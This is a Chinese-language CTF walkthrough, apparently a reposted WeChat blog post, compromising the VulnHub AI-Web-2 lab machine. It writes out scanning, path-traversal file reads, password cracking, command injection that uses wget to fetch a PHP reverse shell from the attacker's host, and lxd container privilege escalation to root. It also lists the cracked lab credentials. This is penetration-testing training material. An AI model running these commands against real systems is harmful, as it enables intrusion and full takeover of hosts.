本周实践的是vulnhub的AI-Web-2镜像,
下载地址,https://download.vulnhub.com/aiweb/AI-Web-2.0.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.220.0/24,
获取到靶机地址是192.168.220.169,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.169,
发现靶机有22端口的ssh服务和80端口的http服务,
浏览器访问http://192.168.220.169,
用admin当用户名进行注册再登录,
获取到应用是XuezhuLi FileSharing,
在网上搜XuezhuLi FileSharing的漏洞和利用方法,
浏览器访问http://192.168.220.169/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd,
继续浏览器访问http://192.168.220.169/viewing.php?file_name=../../../../../../../../../../../../../etc/apache2/.htpasswd,
获取到web登录的账号和密码hash,
保存到hash.txt,并下载密码字典保存到dict.txt,
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt,
进行暴破,john --wordlist=dict.txt hash.txt,
获取到aiweb2admin/c.ronaldo,
对http服务继续进行目录暴破,dirb http://192.168.220.169,
获取到http://192.168.220.169/webadmin,
浏览器访问http://192.168.220.169/webadmin并登录,
获取到提示robots文件里有信息,
浏览器访问http://192.168.220.169/webadmin/robots.txt,
获取到路径/H05Tpin9555/,
浏览器访问http://192.168.220.169/webadmin/H05Tpin9555/,
发现可以提交命令,尝试|| id,成功,
在kali攻击机上准备反弹shell脚本,
cp /usr/share/webshells/php/php-reverse-shell.php shell.php,
python2 -m SimpleHTTPServer,
输入|| wget http://192.168.220.157:8000/shell.php,
查看结果,|| ls,
kali攻击机上开启反弹shell监听,nc -lvp 4444,
浏览器访问http://192.168.220.169/webadmin/H05Tpin9555/shell.php,获取到反弹shell,并查找到ssh的用户名密码,
n0nr00tuser/zxowieoi4sdsadpEClDws1sf,
ssh登录,ssh [email protected],发现有lxd权限,
在kali攻击机上下载容器镜像,
git clone https://github.com/saghul/lxd-alpine-builder.git,
cd lxd-alpine-builder,
kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer,
靶机上进入临时目录,cd /tmp,
下载容器镜像,wget http://192.168.220.157:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz,
导入容器镜像,lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage,
查看,lxc image list,
初始化,lxc init myimage ignite -c security.privileged=true,
配置挂载宿主机根目录,lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true,
启动容器实例,lxc start ignite,
进入容器实例,lxc exec ignite /bin/sh,id确认是root,
进入挂载目录,cd /mnt/root/root,夺旗成功,cat flag.txt,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之AI-Web-2的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论